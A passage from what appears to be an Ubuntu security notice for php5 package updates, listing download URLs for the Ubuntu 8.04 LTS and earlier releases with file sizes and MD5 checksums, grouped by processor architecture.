e74aa42363c97fa9be568bc8a56adeb7\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 2266800 6f6694b6187c749ab3317e8d4b7402f7\r\n 
http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 4481766 4185be1c9738dfd24a73257282a93560\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 2250698 007e53227b36ea9149a17a2e1b3b2fd8\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 137602 12cce6aba8b73d30222d0053c6b6f63e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 22842 d654bbdcc8555d0cf6e7e32a3e173c7f\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 312642 bc44adff15460e9e847908c1c7d7ffe6\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 32868 7f8eb60631c7249cba810625afd9daa9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 19800 b01b91f661d047fbf8b45289fcb224fd\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 8372 914ab45f9de18dc70e66d37a570b45d5\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 21998 f1940631b5b116a3a5f9b617fad38b25\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 37350 6b26a597fb9214ccac66fe51371f9c34\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 27040 dd51e2241c4435aeb47f5f865a9393f9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 39780 9a017d5d7ed8e1f766053f8a25c104f8\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 8058 996ca21adc67c08176938d4b8e20ea85\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 
14166 4352c3f2d45ea409845b05ed15c9f5a1\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 25626 56a16a5e517c3835553a9c92c14845fe\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 20556 f4a3dc7978f2b9f2a07a4b33f71908b7\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 37868 2817efca4159cb3c404b1060bd411aeb\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.2-1ubuntu3.19_i386.deb\r\n Size/MD5: 15140 922e2f5d404fa4f65930fe616f21c2ff\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 2401158 e7aa59451f055cb21c8807cd61e75d7f\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 4701138 386cf9db66f18da2963a9c4ce5809747\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 2360220 b6ba0ac9063e61517bea37d63f261520\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 137628 423363b528daef86e4e416078f5e45d6\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 26614 f79c7e86baa8ab6de5bd1544b95bb591\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 312690 840516b876a5e18749830ffbfb87d590\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 36610 7cb065c6391a6c9f35c3c499fcd03f92\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 22560 0e09b1a23fb2e45fd3bef53975963cdd\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 10132 
c4838519456364dc17c6aca50d8603b5\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 24822 b7fc0a9ddc0bf693707487a36866525d\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 41792 afd7f070c9e44d9187694f19d3f420ac\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 30094 9e6edfe01ec9c838ebc0ff5e3c3f76de\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 43426 115f663062b47cb1712c57f31383affd\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 9800 876623ef4620e4f58d75dadc1e03f0f6\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 15948 7fb6f8516a2eaebb88ffa28d1eb38a3f\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 29418 01977fd8f10aba1847cecd997111a95a\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 23590 ae33ed50de72fbf3cbf209d8357c4f2d\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 40964 f85e236ab27b621fb5b18f26b6ebd526\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.2-1ubuntu3.19_powerpc.deb\r\n Size/MD5: 17250 5a6301e9de77fc7b395ca324553bc406\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 2327642 8728268a4554314724960e6d56d80fdc\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 4538666 2f34ceffb1b99107d58c7194a48370f8\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 2280334 
ceb762d8c3ef6e49c9695a155316eb58\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 137616 3a42b132f6818e277a96196c6553b31e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 24554 e8edbffca300854da30934ca4e4b7ebe\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 312662 af091ce44d8283be869da411bc050092\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 33370 9f807ce655fef5ef722a445793981505\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 20088 3bd40ffface181d2568db35466e7af14\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 8374 05f242bc3e8511351d54d1c809e4ecf0\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 22356 154ac22fddda7b41cb97a897c9c08a1f\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 38648 982bd6a014d8aa992a98351e489e0e2d\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 26834 4838234359de91b98809261b2189d10f\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 40612 5a1bc32b88ebe4d090c6e07ef8b1777f\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 8106 c96c9ac976ab1913911ac0c720ef00dc\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 14056 fc7423fc9e594330f54fcb81e74d2003\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 25964 381f404eac25017312df350d70ef9176\r\n 
http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 20794 86dc27787737d592e8883b7688b52f4c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 38124 c0b5567cfd39eca83d5872c69658dc27\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.2-1ubuntu3.19_sparc.deb\r\n Size/MD5: 15084 987d8eca1a903d46f83d12aa66550b61\r\n\r\nUpdated packages for Ubuntu 8.04 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.4-2ubuntu5.12.diff.gz\r\n Size/MD5: 167020 feae7d3863eeae7fa32aca70899536d5\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.4-2ubuntu5.12.dsc\r\n Size/MD5: 1972 76dfdd0eac161ec6b9f59f657b7512cd\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.4.orig.tar.gz\r\n Size/MD5: 9705468 0826e231c3148b29fd039d7a8c893ad3\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php-pear_5.2.4-2ubuntu5.12_all.deb\r\n Size/MD5: 355284 ce9d80aaf80deb5305115fb7bc03f285\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.4-2ubuntu5.12_all.deb\r\n Size/MD5: 1086 5e3589d2d3cffd873c4fa29fff2aa1f8\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 2615762 0be86e55a9c3333ce9c5c8eccdd02018\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 5094062 905e5185c8513994d9653ed7d5f981cb\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 2572354 8115c400ae7c77c108f1231b0b04e94e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 321346 783695972c54291e5fab8f7537b7002c\r\n 
http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 25038 7a71cb4a6cf70767a20c5b09531cc79e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 364478 71edec85608500b042c8b3b6ea1bb1bb\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 37340 31ecee2ab05578b8640d8a430dab2f50\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gmp_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 17626 9a349fbed4776be3f204d0957872b983\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 20266 aab0448f1319c9664062f218fc7115d6\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 5546 e0bd645a69c11bc77378717523bfd4ad\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 74418 20d709b46e98deb5cee28c753768b167\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 37706 f38cd75303962018b8c5445273814d53\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 56162 988d448560b9a0f6b5c0e27dc92cf3ed\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pspell_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 9542 952713ef6b425a452c63bc3fd92ca6a5\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 5038 c5ea30699ae3d1cf6be067f4a15b9924\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 12418 b6fb1586bc4a6426c675dd14a0262996\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 39644 eb455bc7fa80e4f75df8d260cd93165e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.2.4-2ubuntu5.12_amd64.deb\r\n 
Size/MD5: 28668 93722365a1e8b1a45df8c02c9827d94e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-tidy_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 17892 2600ada79326a965d6d6a6188f7caac0\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 38618 af1b6ec77b71a982400df9b1a3ad2974\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.2.4-2ubuntu5.12_amd64.deb\r\n Size/MD5: 13548 8555607e3bdb309caf77890549b36ffe\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 2474562 5d69a89b1556be3dc5ab7c4c0367fb5e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 4917434 e19d6e3ccbd08c77c260e06fb772faa7\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 2481082 6d634e88363e1bc088382eb7a3861d74\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 317380 c38bdf19a4e7e116e50b80337ba85905\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 23658 6ad9b86ad81d0c7b85ab580a851a8ec4\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 364498 6131924ff3f42d1b6dbbef7cc96710bd\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 32904 4c2271cee2d68ac7d311bf100ba99fb8\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gmp_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 14762 51e61e19b9d17daf01f3d467097a0050\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 18114 dd48fb6fd8d43c8b31d7ae29ed582fa9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 5220 
74e86bcbf39b2c7b14e18c6abece8b46\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 65242 9878f3b2e08048cad405a9a98cb4e1a1\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 34270 21f8aeb13a0d3f95f321c73fd5243666\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 51302 f027f72404d34f0d6701912e34f7dbd6\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pspell_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 8624 13f88320dea8606f09057d5044499ebc\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 4792 d1728dc720da3c8713aec6ee1c5dffe0\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 11730 5200846a3458833fee14d473c034e5fe\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 34362 1aa3dff9d4c30fcbcaaadbdec5b5678f\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 26248 8e83034f75f2c8b73c4edcf4b3830b36\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-tidy_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 16278 51227e09c102aaa3bdf9042d2904dad1\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 35676 f01dbd6d4c898c78b2038371d4e60913\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.2.4-2ubuntu5.12_i386.deb\r\n Size/MD5: 12596 c2cf8fb4483d8938220e0aa2e923ec9e\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/p/php5/libapache2-mod-php5_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 2453878 f2ac57efde4d47fcf96aa3c594e3c3ab\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cgi_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 4879180 9700a93e1c6eed062ff04a564d83d37b\r\n 
http://ports.ubuntu.com/pool/main/p/php5/php5-cli_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 2461958 2560d3f64b8b67d1da89bbd9f446ff45\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-common_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 317130 858efd3daa3f71fe2b09cc8e4e799f8b\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-curl_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 23286 4f4eca0b40f2e7db404f256c0c567913\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dev_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 364518 f3731ba55dfeea2eb9586cdb92158c08\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gd_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 33078 16fbc3fb0cbfe2b17fa5fb4c0c8910ee\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gmp_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 15032 88f6972ffd4afdd5a99e93b9dfdbb57c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-ldap_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 18108 7f83698bfd37463f4bf27be49b8a59cd\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mhash_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 5100 cdb39167a18ca4deaa248951d167e21f\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mysql_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 64320 592a50506eebf51f8148bfefa96605ad\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-odbc_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 33946 edc93ed9a11a2d1ced0e88796ced004c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pgsql_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 50870 e85c3c34cbade823895039c60da4018a\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pspell_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 8644 13a14d55d52beee224405d5032b9d1a2\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-recode_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 4724 afd38f6282ab3c904b5de939c1ac453a\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-snmp_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 11574 1ff0c36b84e822b8a22e2af15bcc81a2\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sqlite_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 33744 
8bcdffb44b89195977ff7dbc0e1606c7\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sybase_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 26136 2164b182696ea5afb8a0d9f9b883d1ae\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-tidy_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 16056 646eb05f87e2818b5d1dce5089c40b31\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xmlrpc_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 35470 27d3bac8471e4c1ae70194f793559154\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xsl_5.2.4-2ubuntu5.12_lpia.deb\r\n Size/MD5: 12432 80882a94ebfdbefdb116709d17c593ff\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/p/php5/libapache2-mod-php5_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 2626598 0a369c6787998ca4f72001ab09f7ad8c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cgi_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 5117830 2c9d1365c7575a7a7061d72bf221814a\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cli_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 2581236 693be837e25f8e3c536abf5450c95314\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-common_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 324354 f7dffb9f086602df55b0cf4045d24735\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-curl_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 28234 93aa97de469ab1012d980148b706efa0\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dev_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 364578 702a4596f996d0a2fdd2f78b7918513c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gd_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 38782 f1eacea712fda83f5fcea789d7f76bdb\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gmp_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 17628 a54afe74e8963650557d9324fd80118b\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-ldap_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 21732 7001d29eccb1067b1d7777666ea633a3\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mhash_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 7672 
24e6cd5e936507133abea29944245299\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mysql_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 78022 0b9f3458df046bda790672b8e7ef3b22\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-odbc_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 41302 2acdb747c2894bc8124247699a925560\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pgsql_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 59740 a6c4617e3126c6763bb1f59ef8e7c88a\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pspell_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 11162 c2dd4211a8c6001992322bbb54ca599c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-recode_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 7188 ecdc26981751f8aa8784e04edf7e415b\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-snmp_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 14246 7633e5c0a90b0f161757f732580fe0e0\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sqlite_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 42406 4c92b6b1b117f7fc1bd6ba4b021668a8\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sybase_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 31376 15d7aa7a6c371c41208417e71a2e76eb\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-tidy_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 20076 134dad0fdb0d45c4e482204be8a60498\r\n ;http://ports.ubuntu.com/pool/main/p/php5/php5-xmlrpc_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 40504 a0c482b7c753cd56c0ef68bcb6332c63\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xsl_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 15706 a74422af7965d15c697b7e65d58fabfd\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/p/php5/libapache2-mod-php5_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 2495284 c9827ccb5a8b026aebba1061c8c506c5\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cgi_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 4886636 7b8059b5ca5fadc73476c28ba3169f6c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cli_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 
